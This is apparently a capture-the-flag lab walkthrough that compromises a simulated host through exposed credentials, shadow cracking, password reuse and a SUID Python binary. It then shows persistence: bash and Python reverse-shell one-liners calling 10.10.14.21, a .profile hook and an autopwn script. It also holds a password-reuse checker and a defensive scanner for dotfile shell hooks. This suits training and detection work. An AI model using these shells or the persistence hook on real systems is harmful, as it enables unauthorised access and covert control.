> Inception_

Exploiting illusions, triggering shells.

// Walkthrough

// Box Information

// Summary

This machine simulates a well-defended internal host that, due to weak credential practices, legacy scripts, and exposed services, is susceptible to a full compromise. This walkthrough will cover every phase:

// Reconnaissance

Start by identifying all exposed services with a comprehensive port scan:

nmap -sV -p- --min-rate=1500 -T4 10.10.10.88

We discover:

We now enumerate HTTP with gobuster and SMB with smbclient and enum4linux:

gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
smbclient -L //10.10.10.88 -N
enum4linux -a 10.10.10.88

Now, this is a personal script that I wrote in order to automate the whole network scan process.
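The author's script is not reproduced on the page. As an added example (my code, not the author's), here is the core of such an automation in Python: it parses the greppable output of the nmap scan above, assuming the scan was saved with an extra `-oG scan.gnmap`, and turns every open port into the service-specific follow-up commands used in this section, de-duplicating them so enum4linux is not queued once for 139 and again for 445. The nmap output embedded in the block is constructed to mirror this box, and the service-to-command table is an assumption to extend per engagement.

```python
"""Parse an nmap greppable (-oG) report and build per-service enumeration commands.

Added example, not the author's automation script. Assumes the port scan was
run with an extra `-oG scan.gnmap`; SAMPLE_GNMAP below is constructed to mirror
the services this box exposes.
"""
import re

# Follow-up commands keyed by nmap's service name. {host} and {port} are filled per port.
SERVICE_COMMANDS = {
    "http": ["gobuster dir -u http://{host}:{port} "
             "-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"],
    "netbios-ssn": ["enum4linux -a {host}"],
    "microsoft-ds": ["smbclient -L //{host} -N", "enum4linux -a {host}"],
    "ssh": ["nc -nv {host} {port} < /dev/null"],   # banner grab only
}

# Constructed sample: what `nmap -sV -p- -oG scan.gnmap 10.10.10.88` might write.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sV -p- -oG scan.gnmap 10.10.10.88\n"
    "Host: 10.10.10.88 ()\tStatus: Up\n"
    "Host: 10.10.10.88 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu/, "
    "80/open/tcp//http//Apache httpd 2.4.29/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "445/open/tcp//microsoft-ds//Samba smbd 4.7.6/, 3306/filtered/tcp//mysql///"
    "\tIgnored State: closed (65530)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 300.00 seconds\n"
)

# -oG port entry: port/state/proto/owner/service/rpc/version/ (owner and rpc usually empty).
# Assumes the version string itself contains no '/'.
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            hosts.setdefault(host, []).append((int(port), proto, state, service, version.strip()))
    return hosts


def enumeration_plan(parsed):
    """Return [(host, port, service, command)] for open TCP ports we know how to enumerate.

    Commands are de-duplicated so enum4linux is queued once even though both
    SMB ports map to it.
    """
    plan, seen = [], set()
    for host, entries in parsed.items():
        for port, proto, state, service, _version in entries:
            if state != "open" or proto != "tcp":
                continue
            for template in SERVICE_COMMANDS.get(service, []):
                cmd = template.format(host=host, port=port)
                if cmd not in seen:
                    seen.add(cmd)
                    plan.append((host, port, service, cmd))
    return plan


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for host, port, service, cmd in enumeration_plan(parse_gnmap(text)):
        print(f"[{host}:{port} {service}] {cmd}")
```

Run it as `python3 plan.py scan.gnmap` to print the commands, or pipe the output into a shell once you trust the table; filtered ports (3306 here) are parsed but deliberately produce nothing.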

// Initial Access

Found an SMB share named public, readable with a null session, containing creds.txt:

smbclient //10.10.10.88/public -N
get creds.txt

Content of creds.txt:

backup:backup123

Use SSH to authenticate:

ssh backup@10.10.10.88

// Local Enumeration

Under /opt/backup we find a legacy backup script with the database root password hard-coded in a commented-out line:

cat /opt/backup/backup.sh
# mysql -u root -pSuperSecretDBpass!

Next, we check sudo permissions:

sudo -l

Nothing directly exploitable here, but the entry is enough to read files as root, so let's check for password reuse by cracking the shadow hashes.

// Password Cracking

Since backup's sudo entry lets it read files as root, we can dump the shadow file:

sudo cat /etc/shadow > shadow.hashes

Run John against it with rockyou. If you also grab /etc/passwd, merge the two with unshadow first so John's single-crack mode can use the GECOS fields:

john shadow.hashes --wordlist=/usr/share/wordlists/rockyou.txt

John recovers hunter2 for the admin account (john --show shadow.hashes lists it afterwards).
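John is the right tool for the cracking itself. As an added example (not part of the original writeup), the block below reimplements the sha512-crypt scheme behind `$6$` shadow entries from Ulrich Drepper's specification using only hashlib, then uses it to test a short list of passwords already in hand against shadow lines. This is the password-reuse check the lateral movement below relies on, and it skips locked and non-`$6$` accounts so they do not burn time. The shadow lines and salts in the block are constructed; the only real-world value is the specification's own test vector, used to validate the implementation.

```python
"""Check cracked passwords for reuse against sha512-crypt ($6$) shadow entries.

Added example, not from the walkthrough. It reimplements glibc's SHA-crypt
($6$) algorithm from Ulrich Drepper's specification using only hashlib, so
a handful of candidates can be verified against any Linux shadow file
without John or hashcat. The shadow lines below are constructed; their
hashes are generated by the same function.
"""
import hashlib

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Order in which the 64 digest bytes are emitted, three at a time, per the spec.
ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
         (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
         (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
         (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
         (62, 20, 41)]


def _repeat_to(block, length):
    """Concatenate copies of a 64-byte digest and cut to exactly `length` bytes."""
    return (block * (length // 64 + 1))[:length]


def _encode(digest):
    """The crypt-style base64 used by SHA-crypt (not RFC 4648)."""
    out = []
    for a, b, c in ORDER + [(None, None, 63)]:
        w = digest[c] if a is None else (digest[a] << 16) | (digest[b] << 8) | digest[c]
        for _ in range(2 if a is None else 4):
            out.append(B64[w & 0x3F])
            w >>= 6
    return "".join(out)


def sha512_crypt(password, salt, rounds=5000):
    """Return the full $6$ hash string for password and salt (salt is cut to 16 chars)."""
    pw, salt = password.encode(), salt[:16].encode()
    n = len(pw)
    b = hashlib.sha512(pw + salt + pw).digest()               # digest B
    ctx = hashlib.sha512(pw + salt)
    ctx.update(_repeat_to(b, n))
    bits = n
    while bits:                                               # walk the bits of len(pw)
        ctx.update(b if bits & 1 else pw)
        bits >>= 1
    a = ctx.digest()                                          # digest A
    p = _repeat_to(hashlib.sha512(pw * n).digest(), n)        # sequence P
    s = _repeat_to(hashlib.sha512(salt * (16 + a[0])).digest(), len(salt))  # sequence S
    c = a
    for i in range(rounds):                                   # the deliberately slow part
        ctx = hashlib.sha512(p if i & 1 else c)
        if i % 3:
            ctx.update(s)
        if i % 7:
            ctx.update(p)
        ctx.update(c if i & 1 else p)
        c = ctx.digest()
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{salt.decode()}${_encode(c)}"


def parse_shadow(lines):
    """Yield (user, rounds, salt, full_hash) for usable $6$ entries.

    Locked ('!...', '*') and non-SHA512 entries are skipped.
    """
    for line in lines:
        fields = line.split(":")
        if len(fields) < 2 or not fields[1].startswith("$6$"):
            continue
        parts = fields[1].split("$")          # '', '6', [rounds=N,] salt, hash
        rounds = 5000
        if parts[2].startswith("rounds="):
            rounds, parts = int(parts[2][7:]), parts[:2] + parts[3:]
        yield fields[0], rounds, parts[2], fields[1]


def check_reuse(shadow_lines, candidates):
    """Return {user: password} for every shadow entry matched by a candidate."""
    found = {}
    for user, rounds, salt, full in parse_shadow(shadow_lines):
        for cand in candidates:
            if sha512_crypt(cand, salt, rounds) == full:
                found[user] = cand
                break
    return found


# Constructed sample shadow file for the accounts in this walkthrough.
SAMPLE_SHADOW = [
    "root:" + sha512_crypt("correct horse", "r00tsalt") + ":19700:0:99999:7:::",
    "admin:" + sha512_crypt("hunter2", "Xk9pQ2mL") + ":19700:0:99999:7:::",
    "backup:" + sha512_crypt("backup123", "b4ckUpSa", rounds=10000) + ":19700:0:99999:7:::",
    "www-data:*:19700:0:99999:7:::",
    "olduser:!" + sha512_crypt("hunter2", "lockedSa") + ":19700:0:99999:7:::",
]
# Passwords already in hand from creds.txt, backup.sh and John.
CANDIDATES = ["backup123", "SuperSecretDBpass!", "hunter2"]

if __name__ == "__main__":
    for user, pw in check_reuse(SAMPLE_SHADOW, CANDIDATES).items():
        print(f"{user}: {pw}")
```

Each verification costs the full 5000 (or `rounds=`) SHA-512 iterations, which is the point of the scheme, so keep this for checking a few known passwords against a second host's shadow file and leave wordlists to John.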

// Lateral Movement

From ip a and a scan of the subnet for SSH, we find another host:

nmap -sT 10.10.10.0/24 -p22 --open

Discovered 10.10.10.90. Try the cracked admin credentials there, betting on password reuse:

ssh admin@10.10.10.90

// Privilege Escalation

Check for SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Among them is a SUID-root copy of the Python interpreter:

/usr/bin/python3.6

Escalate to root. The interpreter starts with effective UID 0, and os.setuid(0) from there sets the real UID to 0 as well, so the bash it spawns keeps root (bash given only an effective root would drop it unless started with -p):

/usr/bin/python3.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

// Persistence

// Post Exploitation

// Bash Dropper (Silent Reverse Shell)

echo 'bash -i >& /dev/tcp/10.10.14.21/443 0>&1' >> /root/.profile

Append rather than overwrite: clobbering root's .profile is noisy and breaks the very login that triggers the hook. The hook fires only when root opens a login shell, and that shell is held until the connection closes, so a listener (nc -lvnp 443) must already be waiting on 10.10.14.21, and in practice you would background the command so root's session still comes up.

// Python Shell


python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.21",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
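Both one-liners leave recognizable strings in whatever file hosts them, and that is how the blue team finds them. As an added example (not from the original page), the following Python scanner checks a home directory's shell startup files for the patterns the dropper above and its common variants leave behind, ignoring comment lines so a decoy in a comment does not fire. The dotfiles it scans are constructed in a temporary directory; the indicator list is my own and deliberately loose.

```python
"""Hunt for reverse-shell hooks planted in shell startup files.

Added example, not from the walkthrough: the defensive counterpart to the
.profile dropper above. It scans the login/interactive startup files of a
home directory for the string patterns common reverse-shell one-liners leave
behind. The sample dotfiles are constructed in a temporary directory; point
scan_home() at a real home (or /root) on a live host.
"""
import os
import re
import tempfile

# (name, pattern). Deliberately loose: IP, port and shell vary between droppers.
INDICATORS = [
    ("bash-devtcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("netcat-exec", re.compile(r"\b(nc|ncat|netcat)\b[^\n]*\s-e\s")),
    ("python-socket-pty", re.compile(r"python[23]?.*socket\.socket\(.*(pty\.spawn|dup2)")),
    ("base64-pipe-shell", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba)?sh\b")),
    ("hidden-tmp-script", re.compile(r"\b(bash|sh)\s+/tmp/\.[A-Za-z0-9_]+")),
]

# Files a login or interactive shell sources; /etc/profile.d/* deserves the same treatment.
STARTUP_FILES = [".profile", ".bashrc", ".bash_profile", ".bash_login", ".zshrc", ".zprofile"]


def scan_text(name, text):
    """Return [(file, line_no, indicator, line)] for one file's contents."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):   # comment lines never execute
            continue
        for indicator, rx in INDICATORS:
            if rx.search(line):
                hits.append((name, no, indicator, stripped))
    return hits


def scan_home(home):
    """Scan every startup file that exists under `home`; unreadable files are skipped."""
    hits = []
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        try:
            with open(path, errors="replace") as fh:
                hits.extend(scan_text(name, fh.read()))
        except OSError:
            continue
    return hits


# Constructed dotfiles: one clean, three carrying different hooks, plus a comment decoy.
SAMPLE_FILES = {
    ".profile": (
        "# ~/.profile: executed by the command interpreter for login shells.\n"
        "# decoy: /dev/tcp/1.2.3.4/4444 in a comment must not fire\n"
        'if [ -n "$BASH_VERSION" ]; then . "$HOME/.bashrc"; fi\n'
        "bash -i >& /dev/tcp/10.10.14.21/443 0>&1\n"
    ),
    ".bashrc": (
        "alias ll='ls -alF'\n"
        "export PATH=$HOME/bin:$PATH\n"
        "(python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.10.14.21\",443));"
        "os.dup2(s.fileno(),0);pty.spawn(\"/bin/bash\")' &) >/dev/null 2>&1\n"
    ),
    ".bash_profile": "# nothing to see here\n",
    ".zshrc": "bash /tmp/.reverse &\n",
}


def demo():
    """Write SAMPLE_FILES to a scratch home directory and scan it."""
    home = tempfile.mkdtemp(prefix="hunt-")
    for name, content in SAMPLE_FILES.items():
        with open(os.path.join(home, name), "w") as fh:
            fh.write(content)
    return scan_home(home)


if __name__ == "__main__":
    for name, no, indicator, line in demo():
        print(f"{name}:{no} [{indicator}] {line}")
```

String matching like this is a triage aid, not proof: an attacker can split or encode the payload, so pair it with a comparison of each dotfile against its package default and with the file's mtime.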
  

// Loot


user.txt: 6fae1c0b5e...94e
root.txt: 89ff4c122c...8a0

// Autopwn Script

#!/bin/bash
# Assumes a listener is already waiting: nc -lvnp 443 on 10.10.14.21.
# The ssh session stays open for as long as the reverse shell lives.
sshpass -p "backup123" ssh -o StrictHostKeyChecking=no backup@10.10.10.88 \
  "echo 'bash -i >& /dev/tcp/10.10.14.21/443 0>&1' > /tmp/.reverse && bash /tmp/.reverse"

// Final Notes

This machine is a good lab for chaining exploits and simulating APT-style persistence. On a real engagement, remove the artifacts you planted (the .profile hook, /tmp/.reverse) and record them in the report; wiping logs is anti-forensics and normally falls outside an authorized scope. ✶